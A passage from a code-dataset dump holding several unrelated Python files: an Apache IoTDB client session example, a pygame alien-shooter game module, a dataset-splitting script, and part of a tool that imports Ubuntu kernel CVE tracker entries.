user=\"root\",\n password=\"root\",\n fetch_size=1024,\n zone_id=\"UTC+8\",\n enable_redirection=True,\n)\nsession.open(False)\n\n# create and delete databases\nsession.set_storage_group(\"root.sg_test_01\")\nsession.set_storage_group(\"root.sg_test_02\")\nsession.set_storage_group(\"root.sg_test_03\")\nsession.set_storage_group(\"root.sg_test_04\")\nsession.delete_storage_group(\"root.sg_test_02\")\nsession.delete_storage_groups([\"root.sg_test_03\", \"root.sg_test_04\"])\n\n# setting time series.\nsession.create_time_series(\n \"root.sg_test_01.d_01.s_01\", TSDataType.BOOLEAN, TSEncoding.PLAIN, Compressor.SNAPPY\n)\nsession.create_time_series(\n \"root.sg_test_01.d_01.s_02\", TSDataType.INT32, TSEncoding.PLAIN, Compressor.SNAPPY\n)\nsession.create_time_series(\n \"root.sg_test_01.d_01.s_03\", TSDataType.INT64, TSEncoding.PLAIN, Compressor.SNAPPY\n)\nsession.create_time_series(\n \"root.sg_test_01.d_02.s_01\",\n TSDataType.BOOLEAN,\n TSEncoding.PLAIN,\n Compressor.SNAPPY,\n None,\n {\"tag1\": \"v1\"},\n {\"description\": \"v1\"},\n \"temperature\",\n)\n\n# setting multiple time series once.\nts_path_lst_ = [\n \"root.sg_test_01.d_01.s_04\",\n \"root.sg_test_01.d_01.s_05\",\n \"root.sg_test_01.d_01.s_06\",\n \"root.sg_test_01.d_01.s_07\",\n \"root.sg_test_01.d_01.s_08\",\n \"root.sg_test_01.d_01.s_09\",\n]\ndata_type_lst_ = [\n TSDataType.FLOAT,\n TSDataType.DOUBLE,\n TSDataType.TEXT,\n TSDataType.FLOAT,\n TSDataType.DOUBLE,\n TSDataType.TEXT,\n]\nencoding_lst_ = [TSEncoding.PLAIN for _ in range(len(data_type_lst_))]\ncompressor_lst_ = [Compressor.SNAPPY for _ in range(len(data_type_lst_))]\nsession.create_multi_time_series(\n ts_path_lst_, data_type_lst_, encoding_lst_, compressor_lst_\n)\n\nts_path_lst_ = [\n \"root.sg_test_01.d_02.s_04\",\n \"root.sg_test_01.d_02.s_05\",\n \"root.sg_test_01.d_02.s_06\",\n \"root.sg_test_01.d_02.s_07\",\n \"root.sg_test_01.d_02.s_08\",\n \"root.sg_test_01.d_02.s_09\",\n]\ndata_type_lst_ = [\n TSDataType.FLOAT,\n TSDataType.DOUBLE,\n TSDataType.TEXT,\n TSDataType.FLOAT,\n TSDataType.DOUBLE,\n TSDataType.TEXT,\n]\nencoding_lst_ = [TSEncoding.PLAIN for _ in range(len(data_type_lst_))]\ncompressor_lst_ = [Compressor.SNAPPY for _ in range(len(data_type_lst_))]\ntags_lst_ = [{\"tag2\": \"v2\"} for _ in range(len(data_type_lst_))]\nattributes_lst_ = [{\"description\": \"v2\"} for _ in range(len(data_type_lst_))]\nsession.create_multi_time_series(\n ts_path_lst_,\n data_type_lst_,\n encoding_lst_,\n compressor_lst_,\n None,\n tags_lst_,\n attributes_lst_,\n None,\n)\n\n# delete time series\nsession.delete_time_series(\n [\n \"root.sg_test_01.d_01.s_07\",\n \"root.sg_test_01.d_01.s_08\",\n \"root.sg_test_01.d_01.s_09\",\n ]\n)\n\n# checking time series\nprint(\n \"s_07 expecting False, checking result: \",\n session.check_time_series_exists(\"root.sg_test_01.d_01.s_07\"),\n)\nprint(\n \"s_03 expecting True, checking result: \",\n session.check_time_series_exists(\"root.sg_test_01.d_01.s_03\"),\n)\nprint(\n \"d_02.s_01 expecting True, checking result: \",\n session.check_time_series_exists(\"root.sg_test_01.d_02.s_01\"),\n)\nprint(\n \"d_02.s_06 expecting True, checking result: \",\n session.check_time_series_exists(\"root.sg_test_01.d_02.s_06\"),\n)\n\n# insert one record into the database.\nmeasurements_ = [\"s_01\", \"s_02\", \"s_03\", \"s_04\", \"s_05\", \"s_06\"]\nvalues_ = [False, 10, 11, 1.1, 10011.1, \"test_record\"]\ndata_types_ = [\n TSDataType.BOOLEAN,\n TSDataType.INT32,\n TSDataType.INT64,\n TSDataType.FLOAT,\n TSDataType.DOUBLE,\n TSDataType.TEXT,\n]\nsession.insert_record(\"root.sg_test_01.d_01\", 1, measurements_, data_types_, values_)\n\n# insert multiple records into database\nmeasurements_list_ = [\n [\"s_01\", \"s_02\", \"s_03\", \"s_04\", \"s_05\", \"s_06\"],\n [\"s_01\", \"s_02\", \"s_03\", \"s_04\", \"s_05\", \"s_06\"],\n]\nvalues_list_ = [\n [False, 22, 33, 4.4, 55.1, \"test_records01\"],\n [True, 77, 88, 1.25, 8.125, bytes(\"test_records02\", \"utf-8\")],\n]\ndata_type_list_ = [data_types_, data_types_]\ndevice_ids_ = [\"root.sg_test_01.d_01\", \"root.sg_test_01.d_01\"]\nsession.insert_records(\n device_ids_, [2, 3], measurements_list_, data_type_list_, values_list_\n)\n\n# insert one tablet into the database.\nvalues_ = [\n [False, 10, 11, 1.1, 10011.1, \"test01\"],\n [True, 100, 11111, 1.25, 101.0, \"test02\"],\n [False, 100, 1, 188.1, 688.25, \"test03\"],\n [True, 0, 0, 0, 6.25, \"test04\"],\n] # Non-ASCII text will cause error since bytes can only hold 0-128 nums.\ntimestamps_ = [4, 5, 6, 7]\ntablet_ = Tablet(\n \"root.sg_test_01.d_01\", measurements_, data_types_, values_, timestamps_\n)\nsession.insert_tablet(tablet_)\n\n# insert one numpy tablet into the database.\nnp_values_ = [\n np.array([False, True, False, True], TSDataType.BOOLEAN.np_dtype()),\n np.array([10, 100, 100, 0], TSDataType.INT32.np_dtype()),\n np.array([11, 11111, 1, 0], TSDataType.INT64.np_dtype()),\n np.array([1.1, 1.25, 188.1, 0], TSDataType.FLOAT.np_dtype()),\n np.array([10011.1, 101.0, 688.25, 6.25], TSDataType.DOUBLE.np_dtype()),\n np.array([\"test01\", \"test02\", \"test03\", \"test04\"], TSDataType.TEXT.np_dtype()),\n]\nnp_timestamps_ = np.array([1, 2, 3, 4], TSDataType.INT64.np_dtype())\nnp_tablet_ = NumpyTablet(\n \"root.sg_test_01.d_02\", measurements_, data_types_, np_values_, np_timestamps_\n)\nsession.insert_tablet(np_tablet_)\n\n# insert one unsorted numpy tablet into the database.\nnp_values_unsorted = [\n np.array([False, False, False, True, True], np.dtype(\">?\")),\n np.array([0, 10, 100, 1000, 10000], np.dtype(\">i4\")),\n np.array([1, 11, 111, 1111, 11111], np.dtype(\">i8\")),\n np.array([1.1, 1.25, 188.1, 0, 8.999], np.dtype(\">f4\")),\n np.array([10011.1, 101.0, 688.25, 6.25, 8, 776], np.dtype(\">f8\")),\n np.array([\"test09\", \"test08\", \"test07\", \"test06\", \"test05\"]),\n]\nnp_timestamps_unsorted = np.array([9, 8, 7, 6, 5], np.dtype(\">i8\"))\nnp_tablet_unsorted = NumpyTablet(\n \"root.sg_test_01.d_02\",\n measurements_,\n data_types_,\n np_values_unsorted,\n np_timestamps_unsorted,\n)\n\n# insert one numpy tablet into the database.\nnp_values_ = [\n np.array([False, True, False, True], TSDataType.BOOLEAN.np_dtype()),\n np.array([10, 100, 100, 0], TSDataType.INT32.np_dtype()),\n np.array([11, 11111, 1, 0], TSDataType.INT64.np_dtype()),\n np.array([1.1, 1.25, 188.1, 0], TSDataType.FLOAT.np_dtype()),\n np.array([10011.1, 101.0, 688.25, 6.25], TSDataType.DOUBLE.np_dtype()),\n np.array([\"test01\", \"test02\", \"test03\", \"test04\"]),\n]\nnp_timestamps_ = np.array([98, 99, 100, 101], TSDataType.INT64.np_dtype())\nnp_bitmaps_ = []\nfor i in range(len(measurements_)):\n np_bitmaps_.append(BitMap(len(np_timestamps_)))\nnp_bitmaps_[0].mark(0)\nnp_bitmaps_[1].mark(1)\nnp_bitmaps_[2].mark(2)\nnp_bitmaps_[4].mark(3)\nnp_bitmaps_[5].mark(3)\nnp_tablet_with_none = NumpyTablet(\n \"root.sg_test_01.d_02\",\n measurements_,\n data_types_,\n np_values_,\n np_timestamps_,\n np_bitmaps_,\n)\nsession.insert_tablet(np_tablet_with_none)\n\n\nsession.insert_tablet(np_tablet_unsorted)\nprint(np_tablet_unsorted.get_timestamps())\nfor value in np_tablet_unsorted.get_values():\n print(value)\n\n# insert multiple tablets into database\ntablet_01 = Tablet(\n \"root.sg_test_01.d_01\", measurements_, data_types_, values_, [8, 9, 10, 11]\n)\ntablet_02 = Tablet(\n \"root.sg_test_01.d_01\", measurements_, data_types_, values_, [12, 13, 14, 15]\n)\nsession.insert_tablets([tablet_01, tablet_02])\n\n# insert one tablet with empty cells into the database.\nvalues_ = [\n [None, 10, 11, 1.1, 10011.1, \"test01\"],\n [True, None, 11111, 1.25, 101.0, \"test02\"],\n [False, 100, 1, None, 688.25, \"test03\"],\n [True, 0, 0, 0, 6.25, None],\n] # Non-ASCII text will cause error since bytes can only hold 0-128 nums.\ntimestamps_ = [16, 17, 18, 19]\ntablet_ = Tablet(\n \"root.sg_test_01.d_01\", measurements_, data_types_, values_, timestamps_\n)\nsession.insert_tablet(tablet_)\n\n# insert records of one device\ntime_list = [1, 2, 3]\nmeasurements_list = [\n [\"s_01\", \"s_02\", \"s_03\"],\n [\"s_01\", \"s_02\", \"s_03\"],\n [\"s_01\", \"s_02\", \"s_03\"],\n]\ndata_types_list = [\n [TSDataType.BOOLEAN, TSDataType.INT32, TSDataType.INT64],\n [TSDataType.BOOLEAN, TSDataType.INT32, TSDataType.INT64],\n [TSDataType.BOOLEAN, TSDataType.INT32, TSDataType.INT64],\n]\nvalues_list = [[False, 22, 33], [True, 1, 23], [False, 15, 26]]\n\nsession.insert_records_of_one_device(\n \"root.sg_test_01.d_01\", time_list, measurements_list, data_types_list, values_list\n)\n\n# execute non-query sql statement\nsession.execute_non_query_statement(\n \"insert into root.sg_test_01.d_01(timestamp, s_02) values(16, 188)\"\n)\n\n# execute sql query statement\nwith session.execute_query_statement(\n \"select * from root.sg_test_01.d_01\"\n) as session_data_set:\n session_data_set.set_fetch_size(1024)\n while session_data_set.has_next():\n print(session_data_set.next())\n# execute sql query statement\nwith session.execute_query_statement(\n \"select s_01, s_02, s_03, s_04, s_05, s_06 from root.sg_test_01.d_02\"\n) as session_data_set:\n session_data_set.set_fetch_size(1024)\n while session_data_set.has_next():\n print(session_data_set.next())\n\n# execute statement\nwith session.execute_statement(\n \"select * from root.sg_test_01.d_01\"\n) as session_data_set:\n while session_data_set.has_next():\n print(session_data_set.next())\n\nsession.execute_statement(\n \"insert into root.sg_test_01.d_01(timestamp, s_02) values(16, 188)\"\n)\n\n# insert string records of one device\ntime_list = [1, 2, 3]\nmeasurements_list = [\n [\"s_01\", \"s_02\", \"s_03\"],\n [\"s_01\", \"s_02\", \"s_03\"],\n [\"s_01\", \"s_02\", \"s_03\"],\n]\nvalues_list = [[\"False\", \"22\", \"33\"], [\"True\", \"1\", \"23\"], [\"False\", \"15\", \"26\"]]\n\nsession.insert_string_records_of_one_device(\n \"root.sg_test_01.d_03\",\n time_list,\n measurements_list,\n values_list,\n)\n\nwith session.execute_raw_data_query(\n [\"root.sg_test_01.d_03.s_01\", \"root.sg_test_01.d_03.s_02\"], 1, 4\n) as session_data_set:\n session_data_set.set_fetch_size(1024)\n while session_data_set.has_next():\n print(session_data_set.next())\n\nwith session.execute_last_data_query(\n [\"root.sg_test_01.d_03.s_01\", \"root.sg_test_01.d_03.s_02\"], 0\n) as session_data_set:\n session_data_set.set_fetch_size(1024)\n while session_data_set.has_next():\n print(session_data_set.next())\n\n# delete database\nsession.delete_storage_group(\"root.sg_test_01\")\n\n# create template\ntemplate = Template(name=\"template_python\", share_time=False)\nm_node_1 = MeasurementNode(\n name=\"s1\",\n data_type=TSDataType.INT64,\n encoding=TSEncoding.RLE,\n compression_type=Compressor.SNAPPY,\n)\nm_node_2 = MeasurementNode(\n name=\"s2\",\n data_type=TSDataType.INT64,\n encoding=TSEncoding.RLE,\n compression_type=Compressor.SNAPPY,\n)\nm_node_3 = MeasurementNode(\n name=\"s3\",\n data_type=TSDataType.INT64,\n encoding=TSEncoding.RLE,\n compression_type=Compressor.SNAPPY,\n)\ntemplate.add_template(m_node_1)\ntemplate.add_template(m_node_2)\ntemplate.add_template(m_node_3)\nsession.create_schema_template(template)\nprint(\"create template success template_python\")\n\n# close session connection.\nsession.close()\n\nprint(\"All executions done!!\")\n","repo_name":"apache/iotdb","sub_path":"iotdb-client/client-py/SessionExample.py","file_name":"SessionExample.py","file_ext":"py","file_size_in_byte":11809,"program_lang":"python","lang":"en","doc_type":"code","stars":4073,"dataset":"github-code","pt":"40"} +{"seq_id":"5545556909","text":"import sys\nfrom time import sleep\n\nimport pygame\n\nfrom bullet import Bullet\nfrom alien import Alien\n\ndef check_keydown_events(event, ai_settings, screen, ship, bullets):\n \"\"\"响应按键。\"\"\"\n if event.key == pygame.K_RIGHT:\n ship.moving_right = True\n elif event.key == pygame.K_LEFT:\n ship.moving_left = True\n elif event.key == pygame.K_SPACE:\n fire_bullet(ai_settings, screen, ship, bullets)\n elif event.key == pygame.K_q:\n sys.exit()\n \ndef check_keyup_events(event, ship):\n \"\"\"响应密钥释放。\"\"\"\n if event.key == pygame.K_RIGHT:\n ship.moving_right = False\n elif event.key == pygame.K_LEFT:\n ship.moving_left = False\n\ndef check_events(ai_settings, screen, stats, sb, play_button, ship, aliens,\n bullets):\n \"\"\"响应按键和鼠标事件.\"\"\"\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n check_keydown_events(event, ai_settings, screen, ship, bullets)\n elif event.type == pygame.KEYUP:\n check_keyup_events(event, ship)\n elif event.type == pygame.MOUSEBUTTONDOWN:\n mouse_x, mouse_y = pygame.mouse.get_pos()\n check_play_button(ai_settings, screen, stats, sb, play_button,\n ship, aliens, bullets, mouse_x, mouse_y)\n \ndef check_play_button(ai_settings, screen, stats, sb, play_button, ship,\n aliens, bullets, mouse_x, mouse_y):\n \"\"\"当玩家点击Play时开始一个新游戏.\"\"\"\n button_clicked = play_button.rect.collidepoint(mouse_x, mouse_y)\n if button_clicked and not stats.game_active:\n # 重置游戏设置.\n ai_settings.initialize_dynamic_settings()\n \n # 隐藏鼠标光标。\n pygame.mouse.set_visible(False)\n \n # 重置游戏统计\n stats.reset_stats()\n stats.game_active = True\n \n # 重置记分牌图像.\n sb.prep_score()\n sb.prep_high_score()\n sb.prep_level()\n sb.prep_ships()\n \n # 清空外星人和子弹的名单\n aliens.empty()\n bullets.empty()\n \n # 创建一个新的舰队和中心的船.\n create_fleet(ai_settings, screen, ship, aliens)\n ship.center_ship()\n\ndef fire_bullet(ai_settings, screen, ship, bullets):\n \"\"\"如果还没有达到极限,就发射一颗子弹.\"\"\"\n # 创建一个新的项目符号,添加到项目符号组.\n if len(bullets) < ai_settings.bullets_allowed:\n new_bullet = Bullet(ai_settings, screen, ship)\n bullets.add(new_bullet)\n\ndef update_screen(ai_settings, screen, stats, sb, ship, aliens, bullets,\n play_button):\n \"\"\"更新屏幕上的图像,然后切换到新屏幕.\"\"\"\n # 重新绘制屏幕,每个都经过循环。\n screen.fill(ai_settings.bg_color)\n \n # 重画飞船和外星人后面的所有子弹。\n for bullet in bullets.sprites():\n bullet.draw_bullet()\n ship.blitme()\n aliens.draw(screen)\n \n #绘制分数信息。\n sb.show_score()\n \n # 如果游戏处于非活动状态,绘制播放按钮\n if not stats.game_active:\n play_button.draw_button()\n\n # 使最近绘制的屏幕可见。\n pygame.display.flip()\n \ndef update_bullets(ai_settings, screen, stats, sb, ship, aliens, bullets):\n \"\"\"更新子弹位置,清除旧子弹。\"\"\"\n # 更新子弹的位置。\n bullets.update()\n\n # 扔掉已经消失的子弹。\n for bullet in bullets.copy():\n if bullet.rect.bottom <= 0:\n bullets.remove(bullet)\n \n check_bullet_alien_collisions(ai_settings, screen, stats, sb, ship,\n aliens, bullets)\n \ndef check_high_score(stats, sb):\n \"\"\"看看有没有新的高分。\"\"\"\n if stats.score > stats.high_score:\n stats.high_score = stats.score\n sb.prep_high_score()\n \ndef check_bullet_alien_collisions(ai_settings, screen, stats, sb, ship,\n aliens, bullets):\n \"\"\"对子弹与外星人的碰撞作出反应。\"\"\"\n # 清除所有相撞的子弹和外星人。\n collisions = pygame.sprite.groupcollide(bullets, aliens, True, True)\n \n if collisions:\n for aliens in collisions.values():\n stats.score += ai_settings.alien_points * len(aliens)\n sb.prep_score()\n check_high_score(stats, sb)\n \n if len(aliens) == 0:\n #如果整个舰队被摧毁,开始一个新的等级。\n bullets.empty()\n ai_settings.increase_speed()\n \n # 提高等级。\n stats.level += 1\n sb.prep_level()\n \n create_fleet(ai_settings, screen, ship, aliens)\n \ndef check_fleet_edges(ai_settings, aliens):\n \"\"\"如果有外星人到达边缘,请适当回应.\"\"\"\n for alien in aliens.sprites():\n if alien.check_edges():\n change_fleet_direction(ai_settings, aliens)\n break\n \ndef change_fleet_direction(ai_settings, aliens):\n \"\"\"放下整个舰队,改变舰队的方向.\"\"\"\n for alien in aliens.sprites():\n alien.rect.y += ai_settings.fleet_drop_speed\n ai_settings.fleet_direction *= -1\n \ndef ship_hit(ai_settings, screen, stats, sb, ship, aliens, bullets):\n \"\"\"回应被外星人击中的飞船。\"\"\"\n if stats.ships_left > 0:\n # 减量ships_left.\n stats.ships_left -= 1\n \n # 更新积分\n sb.prep_ships()\n \n else:\n stats.game_active = False\n pygame.mouse.set_visible(True)\n \n #清空外星人和子弹的名单。\n aliens.empty()\n bullets.empty()\n \n # 创建一个新的舰队,并集中船。\n create_fleet(ai_settings, screen, ship, aliens)\n ship.center_ship()\n \n # 停止\n sleep(0.5)\n \ndef check_aliens_bottom(ai_settings, screen, stats, sb, ship, aliens,\n bullets):\n \"\"\"检查是否有外星人到达屏幕底部。\"\"\"\n screen_rect = screen.get_rect()\n for alien in aliens.sprites():\n if alien.rect.bottom >= screen_rect.bottom:\n # 就像船被撞了一样。\n ship_hit(ai_settings, screen, stats, sb, ship, aliens, bullets)\n break\n \ndef update_aliens(ai_settings, screen, stats, sb, ship, aliens, bullets):\n \"\"\"\n 检查舰队是否在边缘,\n\n然后更新舰队中所有外星人的位置。\n \"\"\"\n check_fleet_edges(ai_settings, aliens)\n aliens.update()\n \n # 寻找与外星人的碰撞。\n if pygame.sprite.spritecollideany(ship, aliens):\n ship_hit(ai_settings, screen, stats, sb, ship, aliens, bullets)\n\n #寻找撞击屏幕底部的外星人。\n check_aliens_bottom(ai_settings, screen, stats, sb, ship, aliens, bullets)\n \ndef get_number_aliens_x(ai_settings, alien_width):\n \"\"\"确定适合一行的外星人的数量。\"\"\"\n available_space_x = ai_settings.screen_width - 2 * alien_width\n number_aliens_x = int(available_space_x / (2 * alien_width))\n return number_aliens_x\n \ndef get_number_rows(ai_settings, ship_height, alien_height):\n \"\"\"确定适合屏幕的外星人的行数。\"\"\"\n available_space_y = (ai_settings.screen_height -\n (3 * alien_height) - ship_height)\n number_rows = int(available_space_y / (2 * alien_height))\n return number_rows\n \ndef create_alien(ai_settings, screen, aliens, alien_number, row_number):\n \"\"\"创建一个外星人,并将其放置在行中。\"\"\"\n alien = Alien(ai_settings, screen)\n alien_width = alien.rect.width\n alien.x = alien_width + 2 * alien_width * alien_number\n alien.rect.x = alien.x\n alien.rect.y = alien.rect.height + 2 * alien.rect.height * row_number\n aliens.add(alien)\n\ndef create_fleet(ai_settings, screen, ship, aliens):\n \"\"\"创造一个完整的外星人舰队.\"\"\"\n # 创建一个外星人,并在一行中找到外星人的数量。\n alien = Alien(ai_settings, screen)\n number_aliens_x = get_number_aliens_x(ai_settings, alien.rect.width)\n number_rows = get_number_rows(ai_settings, ship.rect.height,\n alien.rect.height)\n \n # 创造外星人舰队。\n for row_number in range(number_rows):\n for alien_number in range(number_aliens_x):\n create_alien(ai_settings, screen, aliens, alien_number,\n row_number)\n","repo_name":"OliviaBieber/-","sub_path":"game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":8364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1438042579","text":"# -*- coding = utf-8 -*-\n# 2023/3/8 22:58\nimport os, random\n\n# 合并所有数据到一个文件\ndef merge_files(filedir, fileout):\n with open(fileout, \"w\", encoding=\"UTF-8\") as f1:\n for filename in os.listdir(filedir):\n path = os.path.join(filedir, filename)\n if os.path.isfile(path): # 判断是否是文件还是目录需要用绝对路径\n with open(path, \"r\", encoding=\"UTF-8\") as f2:\n lines = f2.readlines()\n f1.write(\"\".join(lines))\n\n\n# 先分为训练集和测试集,再从训练集分出验证集\ndef split_ratio(fileall, filefir, fileother, fir_ratio, other_ratio):\n with open(fileall, \"r\", encoding=\"UTF-8\") as f:\n lines = f.readlines()\n n_total = len(lines) # 获取数据集的总长度\n\n fir_offset = int(n_total * fir_ratio)\n other_offset = int(n_total * (fir_ratio + other_ratio))\n random.shuffle(lines) # 按行打乱顺序\n fir_data = open(filefir, 'w', encoding=\"UTF-8\")\n other_data = open(fileother, 'w', encoding=\"UTF-8\")\n\n # 写入文件\n for i, line in enumerate(lines):\n if i < fir_offset:\n fir_data.write(line)\n elif i < other_offset:\n other_data.write(line)\n\n fir_data.close()\n other_data.close()\n\n\ndef split_num(fileall, filefir, fileother, other_num):\n with open(fileall, \"r\", encoding=\"UTF-8\") as f:\n lines = f.readlines()\n n_total = len(lines) # 获取数据集的总长度\n\n random.shuffle(lines) # 按行打乱顺序\n fir_data = open(filefir, 'w', encoding=\"UTF-8\")\n other_data = open(fileother, 'w', encoding=\"UTF-8\")\n\n # 写入文件\n for i, line in enumerate(lines):\n if i < other_num:\n other_data.write(line)\n elif i < n_total:\n fir_data.write(line)\n\n fir_data.close()\n other_data.close()\n\n\nif __name__ == '__main__':\n merge_files(\"../cache/data_class\", \"../message/data/all_data.txt\")\n # 将这些数据按照 8:2 的比例划分为训练集和测试集,再从划分出来的训练 集中按照 9:1 的比例划分为训练集和验证集\n # split(\"../data/all_data.txt\", \"../data/train_dev.txt\", \"../data/test.txt\", 0.8, 0.2)\n # split(\"../data/train_dev.txt\", \"../data/train.txt\", \"../data/dev.txt\", 0.9, 0.1)\n # 将数据按照测试集3000验证集1500划分\n split_num(\"../message/data/all_data.txt\", \"../message/data/train_dev.txt\", \"../message/data/test.txt\", 3000)\n split_num(\"../message/data/train_dev.txt\", \"../message/data/train.txt\", \"../message/data/dev.txt\", 1500)\n","repo_name":"ttingCui/Fraud_classify","sub_path":"dataprocess/divide_file.py","file_name":"divide_file.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20842166650","text":"import datetime\nimport glob\nimport os\nimport os.path\nimport re\nimport subprocess\nimport sys\n\nimport kernel_sec.issue\n\nIMPORT_DIR = 'import/ubuntu'\n\nBREAK_FIX_RE = re.compile(r'^break-fix: (?:([0-9a-f]{40})|[-\\w]+)'\n r' (?:([0-9a-f]{40})|[-\\w]+)$')\nDISCOVERED_BY_SEP_RE = re.compile(r'(?:,\\s*(?:and\\s+)?|\\s+and\\s+)')\nCOMMENT_RE = re.compile(r'^(\\w+)>\\s+(.*)$')\nDESCRIPTION_ANDROID_RE = re.compile(r'\\bAndroid\\b')\n\n# Based on load_cve() in scripts/cve_lib.py\ndef load_cve(cve, strict=False):\n '''Loads a given CVE into:\n dict( fields...\n 'pkgs' -> dict( pkg -> dict( release -> (state, notes) ) )\n )\n '''\n\n EXIT_FAIL = 1\n EXIT_OKAY = 0\n\n msg = ''\n code = EXIT_OKAY\n\n data = dict()\n data.setdefault('tags',dict())\n affected = dict()\n lastfield = None\n fields_seen = []\n\n for line in cve:\n line = line.rstrip()\n\n # Ignore blank/commented lines\n if len(line) == 0 or line.startswith('#'):\n continue\n if line.startswith(' '):\n try:\n data[lastfield] += '\\n%s' % (line[1:])\n except KeyError as e:\n msg += \"%s: bad line '%s' (%s)\\n\" % (cve, line, e)\n code = EXIT_FAIL\n continue\n\n try:\n field, value = line.split(':',1)\n except ValueError as e:\n msg += \"%s: bad line '%s' (%s)\\n\" % (cve, line, e)\n code = EXIT_FAIL\n continue\n\n lastfield = field = field.strip()\n if field in fields_seen:\n msg += \"%s: repeated field '%s'\\n\" % (cve, field)\n code = EXIT_FAIL\n else:\n fields_seen.append(field)\n value = value.strip()\n if field == 'Candidate':\n data.setdefault(field,value)\n if value != \"\" and not value.startswith('CVE-') and not value.startswith('UEM-') and not value.startswith('EMB-'):\n msg += \"%s: unknown Candidate '%s' (must be /(CVE|UEM|EMB)-/)\\n\" % (cve, value)\n code = EXIT_FAIL\n elif 'Priority' in field:\n # For now, throw away comments on Priority fields\n if ' ' in value:\n value = value.split()[0]\n if 'Priority_' in field:\n try:\n foo, pkg = field.split('_',1)\n except ValueError:\n msg += \"%s: bad field with 'Priority_': '%s'\\n\" % (cve, field)\n code = EXIT_FAIL\n continue\n data.setdefault(field,value)\n elif 'Patches_' in field:\n '''These are raw fields'''\n try:\n foo, pkg = field.split('_',1)\n except ValueError:\n msg += \"%s: bad field with 'Patches_': '%s'\\n\" % (cve, field)\n code = EXIT_FAIL\n continue\n data.setdefault(field,value)\n elif 'Tags_' in field:\n '''These are processed into the \"tags\" hash'''\n try:\n foo, pkg = field.split('_',1)\n except ValueError:\n msg += \"%s: bad field with 'Tags_': '%s'\\n\" % (cve, field)\n code = EXIT_FAIL\n continue\n data['tags'].setdefault(pkg, set())\n for word in value.strip().split(' '):\n data['tags'][pkg].add(word)\n elif '_' in field:\n try:\n release, pkg = field.split('_',1)\n except ValueError:\n msg += \"%s: bad field with '_': '%s'\\n\" % (cve, field)\n code = EXIT_FAIL\n continue\n try:\n info = value.split(' ',1)\n except ValueError:\n msg += \"%s: missing state for '%s': '%s'\\n\" % (cve, field, value)\n code = EXIT_FAIL\n continue\n state = info[0]\n if state == '':\n state = 'needs-triage'\n\n if len(info) < 2:\n notes = \"\"\n else:\n notes = info[1].strip()\n if notes.startswith('('):\n notes = notes[1:]\n if notes.endswith(')'):\n notes = notes[:-1]\n\n # Work-around for old-style of only recording released versions\n if notes == '' and state[0] in ('0123456789'):\n notes = state\n state = 'released'\n\n if state not in ['needs-triage','needed','active','pending','released','deferred','DNE','ignored','not-affected']:\n msg += \"%s: %s_%s has unknown state: '%s'\\n\" % (cve, release, pkg, state)\n code = EXIT_FAIL\n\n # Verify \"released\" kernels have version notes\n #if state == 'released' and pkg in kernel_srcs and notes == '':\n # msg += \"%s: %s_%s has state '%s' but lacks version note\\n\" % (cve, release, pkg, state)\n # code = EXIT_FAIL\n\n # Verify \"active\" states have an Assignee\n if state == 'active' and data['Assigned-to'].strip() == \"\":\n msg += \"%s: %s_%s has state '%s' but lacks 'Assigned-to'\\n\" % (cve, release, pkg, state)\n code = EXIT_FAIL\n\n affected.setdefault(pkg,dict())\n affected[pkg].setdefault(release,[state,notes])\n elif field not in ['References', 'Description', 'Ubuntu-Description', 'Notes', 'Bugs', 'Assigned-to', 'Approved-by', 'PublicDate', 'PublicDateAtUSN', 'CRD', 'Discovered-by']:\n msg += \"%s: unknown field '%s'\\n\" % (cve, field)\n code = EXIT_FAIL\n else:\n data.setdefault(field,value)\n\n # Check for required fields\n for field in ['Candidate','PublicDate','Description']:\n if field not in data:\n msg += \"%s: missing field '%s'\\n\" % (cve, field)\n code = EXIT_FAIL\n nonempty = ['Candidate']\n if strict:\n nonempty += ['PublicDate']\n if field in nonempty and data[field].strip() == \"\":\n msg += \"%s: required field '%s' is empty\\n\" % (cve, field)\n code = EXIT_FAIL\n\n # Fill in defaults for missing fields\n if 'Priority' not in data:\n data.setdefault('Priority','untriaged')\n # Perform override fields\n if 'PublicDateAtUSN' in data:\n data['PublicDate'] = data['PublicDateAtUSN']\n if 'CRD' in data and data['PublicDate'] != data['CRD']:\n data['PublicDate'] = data['CRD']\n\n data['pkgs'] = affected\n\n if code != EXIT_OKAY:\n raise ValueError(msg.strip())\n return data\n\nclass NonKernelIssue(Exception):\n pass\n\ndef load_ubuntu_issue(f):\n ubu_issue = load_cve(f)\n issue = {}\n\n assert ubu_issue['Candidate'] == os.path.basename(f.name)\n\n if 'linux' not in ubu_issue['pkgs']:\n raise NonKernelIssue()\n\n # Issues with Android in the description almost always refer to things\n # not in mainline, that we should not track\n if DESCRIPTION_ANDROID_RE.search(ubu_issue['Description']):\n raise NonKernelIssue()\n\n issue['description'] = ubu_issue['Description'].strip()\n\n refs = [ref for ref in\n (ubu_issue.get('References', '').strip().split() +\n ubu_issue.get('Bugs', '').strip().split())\n if ':' in ref]\n if refs:\n issue['references'] = refs\n\n comments = {}\n name = 'Ubuntu'\n for line in ubu_issue['Notes'].split('\\n'):\n if not line:\n continue\n match = COMMENT_RE.match(line)\n if match:\n name = 'Ubuntu-' + match.group(1)\n rest = match.group(2)\n else:\n rest = line\n comments.setdefault(name, []).append(rest)\n if comments:\n issue['comments'] = dict((name, '\\n'.join(lines))\n for (name, lines) in comments.items())\n\n disc = ubu_issue.get('Discovered-by', '').strip()\n if disc:\n issue['reporters'] = DISCOVERED_BY_SEP_RE.split(disc)\n\n patches = ubu_issue.get('Patches_linux', '').strip()\n match = BREAK_FIX_RE.match(patches)\n if match and match.group(1):\n issue.setdefault('introduced-by', {})['mainline'] = [match.group(1)]\n if match and match.group(2):\n issue.setdefault('fixed-by', {})['mainline'] = [match.group(2)]\n\n return issue\n\n# Ubuntu doesn't seem to retire issues any more, so only include issues\n# that are active and discovered either this year or last year\ndef get_recent_issues():\n this_year = datetime.datetime.utcnow().year\n for filename in glob.glob(IMPORT_DIR + '/active/CVE-*'):\n cve_id = os.path.basename(filename)\n year = int(cve_id.split('-')[1])\n if year >= this_year - 1:\n yield (cve_id, filename)\n\ndef main():\n os.makedirs(IMPORT_DIR, 0o777, exist_ok=True)\n if os.path.isdir(IMPORT_DIR + 